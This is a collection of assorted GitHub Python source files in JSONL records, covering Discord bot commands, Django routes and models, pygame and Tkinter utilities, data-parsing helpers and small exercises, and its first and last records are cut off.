}\n ]\n }\n response = requests.post(url, headers=headers, json=data)\n \n if response.status_code == 200:\n return response.json()[\"choices\"][0][\"message\"][\"content\"]\n else:\n return None\n\nif __name__ == \"__main__\":\n global_cache = {\n 'character_details': {\n 'username': 'luca',\n 'character_name': 'john_doe',\n 'eye_color': 'blue',\n 'hair_color': 'blonde',\n 'gender': 'Male',\n 'body_type': 'Normal'\n }\n }\n \n character_details = fetch_character_details(global_cache)\n \n avatar_path = generate_avatar_image(character_details)\n print(f\"Avatar saved at: {avatar_path}\")\n \n character_description = generate_character_description(character_details)\n print(f\"Generated Character Description: 
{character_description}\")\n","repo_name":"LucaCGN/AgarthaRPG","sub_path":"dev_app/modules/general/avatar_generation.py","file_name":"avatar_generation.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11887259242","text":"from DataOps import DataPrep\n\nif __name__ == '__main__':\n audio_folder = \"b:/!DATASETS/PDTSC/audio/\"\n transcript_folder = \"b:/!DATASETS/PDTSC/transcripts/\"\n save_folder = 'B:/!temp/'\n\n dp = DataPrep(audio_folder,\n transcript_folder,\n save_folder,\n dataset=\"pdtsc\",\n digitize_numbers=True,\n speeds=(1.0, ),\n mode=\"move\",\n delete_unused=True,\n delete_converted=True,\n debug=False)\n\n dp.run()","repo_name":"vejvarm/speech_recognition_with_TF2_at_UCT_Prague","sub_path":"data_prep/data_prep_PDTSC.py","file_name":"data_prep_PDTSC.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2651402570","text":"import json\nfrom typing import List\n\nPATH_SCHEMA = \"schemas.json\"\nwith open(PATH_SCHEMA) as fp:\n SCHEMA = {k: set(v) for k, v in json.load(fp).items()}\n\n\n# def parser(d: List[dict], fields: list, nested: bool = False, nested_field: str = None) -> list:\n# out = []\n\n# field_set = set(fields)\n# for x in d:\n# if nested is True:\n# assert nested_field is not None\n# x = x[nested_field]\n\n# entry = {**x}\n\n# existing_fields = set(x.keys())\n# nonexisted_fields = field_set.difference(existing_fields)\n# for f in nonexisted_fields:\n# entry[f] = None\n\n# out.append(entry)\n\n# return\n\n\ndef parser(name: str, d: List[dict], schema: dict) -> dict:\n def parse(r, field_set):\n entry = {**r}\n\n existing_fields = set(r.keys())\n nonexisted_fields = field_set.difference(existing_fields)\n for f in nonexisted_fields:\n entry[f] = None\n\n return entry\n\n if name == \"BI_ASSET_01\":\n name = \"BI_ASSET\"\n elif name == \"BI_ASSET_02\":\n name = \"BI_ASSETSTATUS\"\n\n out = {name: []}\n\n for x in d:\n if name == \"BI_ASSET\":\n\n p_asset = parse(x, schema[name])\n\n if \"assetancestor\" in x:\n if \"BI_ASSETANCESTOR\" not in out:\n out['BI_ASSETANCESTOR'] = []\n if 'assetancestor' in p_asset:\n del p_asset['assetancestor']\n\n for x1 in x['assetancestor']:\n p = parse(x1, schema['BI_ASSETANCESTOR'])\n p['assetuid'] = p_asset['assetuid']\n\n out['BI_ASSETANCESTOR'].append(p)\n\n out[name].append(p_asset)\n if name == \"BI_INVE\":\n\n p_inve = parse(x, schema[name])\n\n if \"invcost\" in x:\n if \"BI_INVCOST\" not in out:\n out['BI_INVCOST'] = []\n if 'invcost' in p_inve:\n del p_inve['invcost']\n\n for x1 in x['invcost']:\n p = parse(x1, schema['BI_INVCOST'])\n p['inventoryid'] = p_inve['inventoryid']\n\n out['BI_INVCOST'].append(p)\n\n out[name].append(p_inve)\n elif name == \"BI_MATU\":\n if \"BI_INVU_MATU\" not in out:\n out['BI_INVU_MATU'] = []\n if \"BI_INVUL_MATU\" not in out:\n out['BI_INVUL_MATU'] = []\n\n p_matu = parse(x, schema['BI_MATU'])\n\n if \"invuse\" in x:\n if 'invuse' in p_matu:\n del p_matu['invuse']\n\n if isinstance(x['invuse'], dict):\n x['invuse'] = [x['invuse']]\n for x1 in x['invuse']:\n p = parse(x1, schema['BI_INVU'])\n out['BI_INVU_MATU'].append(p)\n\n if \"invuseline\" in x:\n if 'invuseline' in p_matu:\n del p_matu['invuseline']\n\n if isinstance(x['invuseline'], dict):\n x['invuseline'] = [x['invuseline']]\n for x1 in x['invuseline']:\n p = parse(x1, schema['BI_INVUL'])\n out['BI_INVUL_MATU'].append(p)\n\n 
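# Editor's note (illustrative only; field names are hypothetical): a BI_MATU member such as\n            # {\"invuse\": [...], \"invuseline\": [...], ...} is normalized here -- its nested lists were\n            # popped into the BI_INVU_MATU / BI_INVUL_MATU side tables above, and only the flattened,\n            # schema-padded parent row is appended to out[name] below.\n            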
out[name].append(p_matu)\n\n elif name == \"BI_MATR\":\n if \"BI_INVU_MATR\" not in out:\n out['BI_INVU_MATR'] = []\n if \"BI_INVUL_MATR\" not in out:\n out['BI_INVUL_MATR'] = []\n\n p_matr = parse(x, schema['BI_MATR'])\n\n if \"invuse\" in x:\n if 'invuse' in p_matr:\n del p_matr['invuse']\n\n if isinstance(x['invuse'], dict):\n x['invuse'] = [x['invuse']]\n for x1 in x['invuse']:\n p = parse(x1, schema['BI_INVU'])\n out['BI_INVU_MATR'].append(p)\n if \"invuseline\" in x:\n if 'invuseline' in p_matr:\n del p_matr['invuseline']\n\n if isinstance(x['invuseline'], dict):\n x['invuseline'] = [x['invuseline']]\n for x1 in x['invuseline']:\n p = parse(x1, schema['BI_INVUL'])\n out['BI_INVUL_MATR'].append(p)\n\n out[name].append(p_matr)\n\n elif name == \"BI_WO\":\n if \"BI_WOSTATUS\" not in out:\n out['BI_WOSTATUS'] = []\n\n p_wo = parse(x, schema['BI_WO'])\n\n if \"wostatus\" in x:\n if 'wostatus' in p_wo:\n del p_wo['wostatus']\n\n for x1 in x['wostatus']:\n p = parse(x1, schema['BI_WOSTATUS'])\n p['workorderid'] = p_wo['workorderid']\n\n out['BI_WOSTATUS'].append(p)\n\n out[name].append(p_wo)\n\n else:\n p = parse(x, schema[name])\n out[name].append(p)\n\n return out\n\n# def preprocess(data: dict, name: str) -> dict:\n# # NOTE: HoangLe [Apr-04]: This version will be used in optimizing phase\n\n# if name == \"BI_ASSET\":\n# if 'assetstatus' in data['member'][0]:\n# out = {\n# 'BI_ASSETSTATUS': parser(data['member'], SCHEMA['BI_ASSETSTATUS'],\n# True, 'assetstatus')\n# }\n# else:\n# out = {\"BI_ASSET\": parser(data['member'], SCHEMA['BI_ASSET'])}\n# elif name == \"BI_WO\":\n# if 'wostatus' in data['member'][0]:\n# out = {'BI_WOSTATUS': parser(data['member'], SCHEMA['BI_WOSTATUS'],\n# True, 'wostatus')}\n\n# else:\n# out = {'BI_WO': parser(data['member'], SCHEMA['BI_WO'])}\n# elif name in ['BI_MATU', 'BI_MATR']:\n# if 'invuse' in data['member'][0]:\n# out = {\n# 'BI_INVU': parser(data['member'], SCHEMA['BI_INVU'],\n# True, 'invuse')}\n# elif 'invuseline' in data['member'][0]:\n# out = {'BI_INVUL': parser(data['member'], SCHEMA['BI_INVUL'],\n# True, 'invuseline')}\n# else:\n# out = {name: parser(data['member'], SCHEMA[name])}\n# else:\n# out = {name: parser(data['member'], SCHEMA[name])}\n\n# return out\n\n\ndef preprocess(data: dict, name: str) -> dict:\n return parser(name, data['member'], SCHEMA)\n","repo_name":"hoangletc/azure-func-spp_preprocess","sub_path":"spp_preprocess/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":6375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38822388035","text":"from django.urls import path\r\nfrom.import views\r\n\r\nurlpatterns = [\r\n \r\n path('', views.index, name=\"index\"),\r\n path('blog/', views.blog, name=\"blog\"),\r\n path('main/', views.mainPage, name=\"main\"),\r\n path('myprofile/', views.myprofile, name=\"myprofile\"),\r\n path('profile/', views.profile, name=\"profile\"),\r\n\r\n\r\n path('signup/', views.signup_view, name=\"signup\"),\r\n path('login/', views.login_view, name=\"login\"),\r\n path('logout/', views.logout_view, name=\"logout\"),\r\n path('', views.login_view, name=\"Index\"),\r\n\r\n \r\n path('createbiodata/', views.biodata_create, name=\"createbiodata\"),\r\n path('biodatalist/', views.biodata_list, name=\"biodatalist\"),\r\n path('biodatadetail/', views.biodata_detail, name=\"biodatadetail\"),\r\n \r\n path('searchbio/', views.search_bio, name=\"searchbio\"),\r\n path('news/', views.news, name=\"news\"),\r\n path('pricing/', 
views.pricing_view, name=\"pricing\"),\r\n    \r\n    \r\n    \r\n\r\n\r\n\r\n\r\n\r\n]\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Lamya-ishrat/Matrimonial-website","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} {"seq_id":"14619613196","text":"from PIL import Image, ImageTk\nimport tkinter\nfrom matplotlib import pyplot as plt\n\n\ndef plot_binomial(a, b, c, mn=-10, mx=10):\n    values = tuple(range(mn, mx + 1))\n    ys = tuple(a * x**2 + b * x + c for x in values)\n    return plt.plot(values, ys)\n\n\n# init\nwindow = tkinter.Tk()\nwindow.geometry(\"800x600+10+20\")\n\n# UI setup\nrow = tkinter.Frame()\nlab = tkinter.Label(row, width=8, text=\"Size: \", anchor='w')\n\nent = tkinter.Entry(row)\nbutton = tkinter.Button(row, text='!!!')\nrow.pack()\nlab.pack(side=tkinter.LEFT)\nent.pack()\nbutton.pack(side=tkinter.RIGHT)\n\nlabel = tkinter.Label(window)\nlabel.pack()\n\n\n# populate the GUI\ndef display_image(new_image, new_scale=1.0):\n    image = new_image.resize(\n        (int(new_image.size[0] * new_scale),\n         int(new_image.size[1] * new_scale)))\n    tk_image = ImageTk.PhotoImage(image)\n    label.configure(image=tk_image)\n    label.image = tk_image\n\n\n# button handlers\ndef scale_image():\n    try:\n        new_scale = float(ent.get())\n    except Exception:\n        print(\"The value is not a float!\")\n        return\n    display_image(raw_image, new_scale)\n\n\nbutton.configure(command=scale_image)\n\n\ndef main(image, scale):\n    global raw_image, start_scale\n    raw_image = image\n    start_scale = scale\n    ent.insert(tkinter.END, str(start_scale))\n    display_image(raw_image, start_scale)\n    window.mainloop()\n\n\nif __name__ == \"__main__\":\n    raw_image = Image.open('teo_ik.png')\n    start_scale = 0.1\n    main(raw_image, start_scale)\n","repo_name":"ghMaxi/aip2022","sub_path":"seminars/2022-04-20/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} {"seq_id":"5285119696","text":"from typing import List, Tuple, Any\nimport datetime\n\nfrom core.bot import Bot\nfrom core.data import custom_data_chunk, DataChunkBase, DataManagerError\nfrom core.command.const import *\nfrom core.command import UserCommandBase, custom_user_command\nfrom core.command import BotCommandBase, BotSendMsgCommand\nfrom core.communication import MessageMetaData, PrivateMessagePort, GroupMessagePort\nfrom utils.time import get_current_date_str, get_current_date_raw, str_to_datetime, datetime_to_str\n\nCFG_CHAT_INTER = \"chat_interval\"\n\n# register a custom DataChunk\nDC_CHAT_RECORD = \"chat_record\"\nDCK_CHAT_TIME = \"time\"\n\n\n@custom_data_chunk(identifier=DC_CHAT_RECORD)\nclass _(DataChunkBase):\n    def __init__(self):\n        super().__init__()\n\n\ndef get_default_chat_time(interval: int) -> str:\n    cur_time = get_current_date_raw()\n    cur_time = cur_time - datetime.timedelta(seconds=interval+1)\n    return datetime_to_str(cur_time)\n\n\n@custom_user_command(readable_name=\"custom chat command\", priority=DPP_COMMAND_PRIORITY_TRIVIAL,\n                     flag=DPP_COMMAND_FLAG_FUN | DPP_COMMAND_FLAG_CHAT)\nclass ChatCommand(UserCommandBase):\n    \"\"\"\n    Custom chat (dialogue) command.\n    \"\"\"\n\n    def __init__(self, bot: Bot):\n        super().__init__(bot)\n        bot.cfg_helper.register_config(CFG_CHAT_INTER, \"20\", \"custom chat trigger interval, in seconds\")\n        self.interval: int = -1\n        self.interval_delta: datetime.timedelta = datetime.timedelta(seconds=20)\n\n    def can_process_msg(self, msg_str: str, meta: MessageMetaData) -> Tuple[bool, bool, 
Any]:\n should_proc: bool = False\n target: str = meta.group_id if meta.group_id else meta.user_id\n try:\n time_str = self.bot.data_manager.get_data(DC_CHAT_RECORD, [target, DCK_CHAT_TIME])\n except DataManagerError:\n default_time = get_default_chat_time(self.get_interval())\n time_str = self.bot.data_manager.get_data(DC_CHAT_RECORD, [target, DCK_CHAT_TIME], default_val=default_time)\n feedback = \"\"\n if get_current_date_raw() >= str_to_datetime(time_str) + self.get_interval_delta():\n feedback = self.bot.loc_helper.process_chat(msg_str)\n if feedback:\n should_proc = True\n self.bot.data_manager.set_data(DC_CHAT_RECORD, [target, DCK_CHAT_TIME], get_current_date_str())\n should_pass: bool = False\n return should_proc, should_pass, feedback\n\n def process_msg(self, msg_str: str, meta: MessageMetaData, hint: Any) -> List[BotCommandBase]:\n port = GroupMessagePort(meta.group_id) if meta.group_id else PrivateMessagePort(meta.user_id)\n feedback: str = hint\n return [BotSendMsgCommand(self.bot.account, feedback, [port])]\n\n def get_help(self, keyword: str, meta: MessageMetaData) -> str:\n return \"\"\n\n def get_description(self) -> str:\n return \"\"\n\n def get_interval(self) -> int:\n if self.interval >= 0:\n return self.interval\n try:\n self.interval = int(self.bot.cfg_helper.get_config(CFG_CHAT_INTER)[0])\n except (ValueError, IndexError):\n self.interval = 20\n self.interval_delta = datetime.timedelta(seconds=self.interval)\n return self.interval\n\n def get_interval_delta(self) -> datetime.timedelta:\n if self.interval >= 0:\n return self.interval_delta\n self.get_interval()\n return self.interval_delta\n","repo_name":"pear-studio/nonebot-dicepp","sub_path":"src/plugins/DicePP/module/common/chat_command.py","file_name":"chat_command.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"52"} +{"seq_id":"42841686510","text":"import discord\nfrom discord.ext import commands\nfrom functions import admin_funcs\nfrom discord.commands import Option\nfrom datetime import datetime\nimport asyncio\nfrom discord.commands import OptionChoice\nfrom variables import global_vars\n\n\nclass admin_commands(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_application_command_completion(self, ctx):\n\n channel = self.bot.get_channel(global_vars.log_channel_id)\n embed = discord.Embed(\n description=\n f\"Executed Command: {ctx.command}\\nAuthor: {ctx.author.mention}\\nLocation: {ctx.channel.mention}\",\n timestamp=datetime.now(),\n color=discord.Colour.green(),\n )\n embed.set_footer(text=f\"User ID: {ctx.author.id}\")\n embed.set_author(name=f\"{ctx.author}\", icon_url=ctx.author.avatar)\n await channel.send(embed=embed)\n\n\n# Logging - send embed to aws-logs channel when command is invoked whether failed or successful\n\n @commands.Cog.listener()\n async def on_application_command(self, ctx):\n channel = self.bot.get_channel(global_vars.log_channel_id)\n embed = discord.Embed(\n description=\n f\"Invoked Command: {ctx.command}\\nAuthor: {ctx.author.mention}\\nLocation: {ctx.channel.mention}\",\n timestamp=datetime.now(),\n color=discord.Colour.yellow(),\n )\n embed.set_footer(text=f\"User ID: {ctx.author.id}\")\n embed.set_author(name=f\"{ctx.author}\", icon_url=ctx.author.avatar)\n await channel.send(embed=embed)\n\n \n @commands.Cog.listener()\n async def on_message_delete(self, msg):\n # call global variable\n global_vars.message = msg\n return 
global_vars.message\n\n    @commands.Cog.listener()\n    async def on_bulk_message_delete(self, msgs):\n        # call global variable\n        global_vars.message = msgs\n        global_vars.messages_count = len(msgs)\n        return global_vars.message,global_vars.messages_count\n\n    # Clear Command\n    log_choice = [\n        OptionChoice(name=\"Yes\", value=\"Yes\"),\n        OptionChoice(name=\"No\", value=\"No\")\n    ]\n\n    @discord.slash_command(guild_ids=[global_vars.server_id],\n                           description=\"clear messages in chat.\")\n    @commands.has_role(global_vars.administrator)\n    async def clear(self, ctx, amount: Option(\n        discord.SlashCommandOptionType.integer,\n        description=\"amount of messages\",\n        required=True,\n    ), user: Option(\n        discord.SlashCommandOptionType.user,\n        description=\"purge messages from user\",\n        required=False,\n        default=None,\n    ), logging: Option(discord.SlashCommandOptionType.string,\n                       description=\"enable or disable logging\",\n                       required=False,\n                       default=None,\n                       choices=log_choice)):\n        await ctx.response.defer(ephemeral=True)\n        channel = self.bot.get_channel(global_vars.log_channel_id)\n        if ctx.channel.id == global_vars.log_channel_id and logging == \"Yes\":\n            # purge with logging\n            await admin_funcs.purge(ctx, amount, user)\n            \n            if amount == 1:\n                # call purge-logging\n                await asyncio.sleep(5)\n                await admin_funcs.purge_logging(ctx, channel, amount, global_vars.message)\n            else:\n                # call purge-logging\n                await asyncio.sleep(5)\n                await admin_funcs.purge_logging(ctx, channel, amount, global_vars.message)\n        else:\n            # purge without logging in other channels\n            await admin_funcs.purge(ctx, amount, user)\n\n    # Package Command\n    @discord.slash_command(guild_ids=[global_vars.server_id],\n                           description=\"package logs before today's date.\")\n    @commands.has_role(global_vars.administrator)\n    async def package(\n        self,\n        ctx,\n        amount: Option(\n            discord.SlashCommandOptionType.integer,\n            description=\"amount of messages\",\n            required=True,\n        ),\n    ):\n        await ctx.response.defer(ephemeral=True)\n        channel = self.bot.get_channel(global_vars.log_channel_id)\n        if ctx.channel.id == global_vars.log_channel_id:\n            messages = await channel.history(limit=amount).flatten()\n            global_vars.messages_count = len(messages)\n            await asyncio.sleep(5)\n            await admin_funcs.package_logging(ctx, channel, amount, messages)\n        else:\n            await ctx.respond(\n                f\"/package command can only be run in {channel.mention}\",\n                ephemeral=True)\n\ndef setup(bot):\n    bot.add_cog(admin_commands(bot))\n","repo_name":"creationsoftre/AWS-Discord-BOT","sub_path":"cogs/admin_commands.py","file_name":"admin_commands.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} {"seq_id":"8426396703","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport requests\nresponse = requests.get(\"http://www.novelscape.net/wxxs/j/jingyong/ffwz/001.htm\")\nresponse.encoding = \"big5\"\nbook1 = response.text\n\n\n# In[2]:\n\n\nbook1[:]\n\n\n# In[4]:\n\n\nbook1[0:]\n\n\n# In[5]:\n\n\nbook1[:87]\n\n\n# In[6]:\n\n\nbook1[87:8787]\n\n\n# In[7]:\n\n\nbook1[87:8787:87]\n\n\n# In[8]:\n\n\nbook1[:87:3]\n\n\n# In[9]:\n\n\nbook1[0::87]\n\n\n# In[10]:\n\n\nbook1[::87] \n\n","repo_name":"Bro-Chen-beep/JerryHW","sub_path":"0312/0312-3.py","file_name":"0312-3.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} {"seq_id":"41735461665","text":"from typing import Any\nfrom django.db import models\n\n# Create your models here.\n\n# ==================== 
#\n# Base Project Model\n# ==================== #\nclass Project(models.Model):\n    title = models.CharField(max_length=100)\n    short_description = models.TextField(default=\"\")\n    description = models.TextField(default=\"\")\n    \n    class Meta:\n        # Make this an abstract class so that it wont be created in the database\n        abstract = True\n\n    def __init__(self, *args: Any, **kwargs: Any) -> None:\n        super().__init__(*args, **kwargs)\n        self.static_preview_path = ''\n    \n\nclass Lab(Project):\n    pdf_title = models.CharField(max_length=100)\n    abstract = models.TextField(default=\"\")\n    \n    class Meta:\n        db_table = 'home_lab'\n    \nclass Game(Project):\n    url = models.CharField(max_length=100)\n    \n    class Meta:\n        db_table = 'home_game'\n    \n\n","repo_name":"the-iron-ryan/personal-website","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} {"seq_id":"12787914188","text":"import os\nimport pygame\n\n\nclass Core:\n    \"\"\"Basically just a container for anything most closely classified as a \"core engine\" function.\"\"\"\n\n    KEY_LEFT = pygame.K_LEFT\n    KEY_RIGHT = pygame.K_RIGHT\n    KEY_UP = pygame.K_UP\n    KEY_DOWN = pygame.K_DOWN\n    KEY_ESCAPE = pygame.K_ESCAPE\n\n    SPECIAL_CHARS = (KEY_LEFT, KEY_RIGHT, KEY_UP, KEY_DOWN, KEY_ESCAPE)\n\n    def __init__(self, display_width, display_height):\n        # filesystem info\n        self.main_dir = os.path.split(os.path.abspath(__file__))[0]\n        self.images_dir = os.path.join(self.main_dir, \"images\")\n\n        # creating a Core initializes pygame\n        pygame.init()\n\n        # display info\n        self.display_width = display_width\n        self.display_height = display_height\n        self.display = pygame.display.set_mode((self.display_width, self.display_height))\n\n        self.__caption = None\n        self.__icon = None\n\n        self.load_fonts()\n\n        # input handling\n        self.__is_pressed = {}\n        self.mouse = (0, 0, 0)\n        self.run = True\n\n    def set_caption(self, display_name):\n        \"\"\"Sets the title on the window.\"\"\"\n        self.__caption = display_name\n        if self.__caption:\n            pygame.display.set_caption(self.__caption)\n\n    def set_icon(self, name):\n        \"\"\"Loads 'name' and sets it as the window icon.\"\"\"\n        self.__icon = self.load_image(name)\n        if self.__icon:\n            pygame.display.set_icon(self.__icon)\n\n    def load_image(self, name):\n        \"\"\"Loads a pygame image and returns it.\"\"\"\n        fullname = os.path.join(self.images_dir, name)\n        try:\n            image = pygame.image.load(fullname)\n        except pygame.error as err:\n            raise SystemExit(err)\n        # image = image.convert()\n        return image\n\n    def load_fonts(self):\n        \"\"\"Loads some pygame fonts into the Core.\"\"\"\n        self.font_small = pygame.font.SysFont(\"comicsansms\", 25)\n        self.font_med = pygame.font.SysFont(\"comicsansms\", 50)\n        self.font_large = pygame.font.SysFont(\"comicsansms\", 80)\n\n    def message_to_screen(self, msg, color, y_displace=0, size=\"small\"):\n        \"\"\"Renders msg centered on the display. (Fixed: the original lacked self and called an undefined create_text_objects() with module-level display_width/display_height.)\"\"\"\n        font = {\"small\": self.font_small, \"med\": self.font_med, \"large\": self.font_large}[size]\n        text_surface = font.render(msg, True, color)\n        text_rect = text_surface.get_rect()\n        text_rect.center = (self.display_width / 2), (self.display_height / 2) + y_displace\n        self.display.blit(text_surface, text_rect)\n\n    def is_key_pressed(self, key):\n        \"\"\"Returns True if key is currently being pressed.\"\"\"\n        if key not in self.SPECIAL_CHARS:\n            key = ord(key.lower())\n\n        return self.__is_pressed.get(key, False)\n\n    def is_left_clicked(self):\n        return self.mouse[2]\n\n    def get_mouse_pos(self):\n        return self.mouse[0], self.mouse[1]\n\n    def update_input(self):\n        for key in self.__is_pressed.keys():\n            self.__is_pressed[key] = False\n\n        for event in 
pygame.event.get():\n if event.type == pygame.QUIT:\n self.run = False\n if event.type == pygame.KEYDOWN:\n self.__is_pressed[event.key] = True\n if event.type == pygame.KEYUP:\n self.__is_pressed[event.key] = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.mouse = (*event.pos, event.button)\n print(self.mouse)\n if event.type == pygame.MOUSEBUTTONUP:\n self.mouse = (*event.pos, 0)\n print(self.mouse)","repo_name":"ajmacedonia/Rysk","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36569120121","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\ndef closestDistanceBetweenLines(a0, a1, b0, b1, clampAll=False, clampA0=False, clampA1=False, clampB0=False,\n clampB1=False):\n ''' Given two lines defined by numpy.array pairs (a0,a1,b0,b1)\n Return the closest points on each segment and their distance\n '''\n\n # If clampAll=True, set all clamps to True\n if clampAll:\n clampA0 = True\n clampA1 = True\n clampB0 = True\n clampB1 = True\n\n # Calculate denomitator\n A = a1 - a0\n B = b1 - b0\n magA = np.linalg.norm(A)\n magB = np.linalg.norm(B)\n\n _A = A / magA\n _B = B / magB\n\n cross = np.cross(_A, _B)\n denom = np.linalg.norm(cross) ** 2\n\n # If lines are parallel (denom=0) test if lines overlap.\n # If they don't overlap then there is a closest point solution.\n # If they do overlap, there are infinite closest positions, but there is a closest distance\n if not denom:\n d0 = np.dot(_A, (b0 - a0))\n\n # Overlap only possible with clamping\n if clampA0 or clampA1 or clampB0 or clampB1:\n d1 = np.dot(_A, (b1 - a0))\n\n # Is segment B before A?\n if d0 <= 0 >= d1:\n if clampA0 and clampB1:\n if np.absolute(d0) < np.absolute(d1):\n return a0, b0, np.linalg.norm(a0 - b0)\n return a0, b1, np.linalg.norm(a0 - b1)\n\n\n # Is segment B after A?\n elif d0 >= magA <= d1:\n if clampA1 and clampB0:\n if np.absolute(d0) < np.absolute(d1):\n return a1, b0, np.linalg.norm(a1 - b0)\n return a1, b1, np.linalg.norm(a1 - b1)\n\n # Segments overlap, return distance between parallel segments\n return None, None, np.linalg.norm(((d0 * _A) + a0) - b0)\n\n # Lines criss-cross: Calculate the projected closest points\n t = (b0 - a0)\n detA = np.linalg.det([t, _B, cross])\n detB = np.linalg.det([t, _A, cross])\n\n t0 = detA / denom\n t1 = detB / denom\n\n pA = a0 + (_A * t0) # Projected closest point on segment A\n pB = b0 + (_B * t1) # Projected closest point on segment B\n\n # Clamp projections\n if clampA0 or clampA1 or clampB0 or clampB1:\n if clampA0 and t0 < 0:\n pA = a0\n elif clampA1 and t0 > magA:\n pA = a1\n\n if clampB0 and t1 < 0:\n pB = b0\n elif clampB1 and t1 > magB:\n pB = b1\n\n # Clamp projection A\n if (clampA0 and t0 < 0) or (clampA1 and t0 > magA):\n dot = np.dot(_B, (pA - b0))\n if clampB0 and dot < 0:\n dot = 0\n elif clampB1 and dot > magB:\n dot = magB\n pB = b0 + (_B * dot)\n\n # Clamp projection B\n if (clampB0 and t1 < 0) or (clampB1 and t1 > magB):\n dot = np.dot(_A, (pB - a0))\n if clampA0 and dot < 0:\n dot = 0\n elif clampA1 and dot > magA:\n dot = magA\n pA = a0 + (_A * dot)\n\n return pA, pB, np.linalg.norm(pA - pB)\n\ndef point_in_cube(x):\n return x * (np.random.rand(3) - .5)\n\nour_data = {'threshold':[],'connection probability':[],'number of connections':[]}\npaper = {'threshold':[],'connection probability':[],'number of connections':[]}\n\nfor i in range(10):\n # simulation parameters\n 
cube_side = 10e-6 # [m] # 1 we look at 10 μm sides for this\n threshold_dist = 1e-6 # [m] # 1 μm\n neurite_density = 10.61e18 # [m^(-3)] # density is 10.61 μm3. \n num_samples = int(neurite_density * cube_side**3)\n\n # empty array to save distance samples in\n dist_samples = np.empty(num_samples)\n\n for i in tqdm(range(num_samples)):\n # generate line segments\n P1 = point_in_cube(cube_side)\n P2 = point_in_cube(cube_side)\n Q1 = point_in_cube(cube_side)\n Q2 = point_in_cube(cube_side)\n\n # calculate the closest distance between 2 lines\n P, Q, d = closestDistanceBetweenLines(P1, P2, Q1, Q2)\n\n # save distance\n dist_samples[i] = d\n\n # plot histogram\n our_data['threshold'].append(threshold_dist*10**6)\n our_data['connection probability'].append(np.sum(np.where(dist_samples>> d20 = Dice(20)\n >>> 1 <= d20.roll() <= 20\n True\n \"\"\"\n\n def __init__(self, sides):\n self.sides = sides\n\n def roll(self):\n return random.randint(1, self.sides)\n\n\ndef main():\n \"\"\"\n Roll n-sided dice and return each result and the total.\n\n >>> monkeypatch = getfixture('monkeypatch')\n >>> monkeypatch.setattr('sys.argv', ['roll-dice'])\n >>> main()\n rolled ...\n >>> monkeypatch.setattr('sys.argv', ['roll-dice', '2'])\n >>> main()\n rolled ...\n rolled ...\n total ...\n \"\"\"\n options = _get_options()\n dice = Dice(options.sides)\n rolls = [dice.roll() for n in range(options.number)]\n for roll in rolls:\n print('rolled', roll)\n if options.number > 1:\n print('total', sum(rolls))\n\n\n__name__ == '__main__' and main()\n","repo_name":"jaraco/jaraco.util","sub_path":"jaraco/util/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70570972325","text":"import math\n\ndef solution(progresses, speeds):\n days = []\n answer = []\n \n for progress, speed in zip(progresses, speeds):\n days.append(math.ceil((100 - progress) / speed))\n\n maximum = days[0]\n day_cnt = 0\n for day in days:\n if day > maximum:\n maximum = day\n answer.append(day_cnt)\n day_cnt = 1\n else: \n day_cnt += 1\n answer.append(day_cnt)\n \n return answer\n \n","repo_name":"jeanP-tech/Algorithms","sub_path":"기능개발.py","file_name":"기능개발.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11327529509","text":"\"\"\"\n215 = 32768 ve rakamlarının toplamı 3+2+7+6+8 = 26'dır.\n21000 sayısının rakamlarının toplamı kaçtır?\n\"\"\"\nnumber = 2**1000\ndigits = []\n\nwhile number > 0:\n digit = number % 10\n digits.insert(0, digit)\n number = number // 10\npowerDigitSum = sum(digits)\nprint(powerDigitSum)","repo_name":"OZDOKUR/Python-euler","sub_path":"16_Power_Digit_Sum.py","file_name":"16_Power_Digit_Sum.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17015499363","text":"import logging\nfrom typing import Tuple\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom mgc.audioset.loaders import MusicGenreSubsetLoader\nfrom mgc.audioset.transform import flatten_features, tensor_to_numpy\nfrom mgc.experiments.base import DatasetLoader\n\n\nclass NumpyMusicGenreSetLoader(DatasetLoader):\n\n def __init__(self, datadir):\n self.datadir = datadir\n\n def load(\n self,\n balanced=False,\n repeat=False) -> Tuple[np.array, np.array, np.array, np.array]:\n \"\"\"\n Returns a tuple including train and test sets\n as 
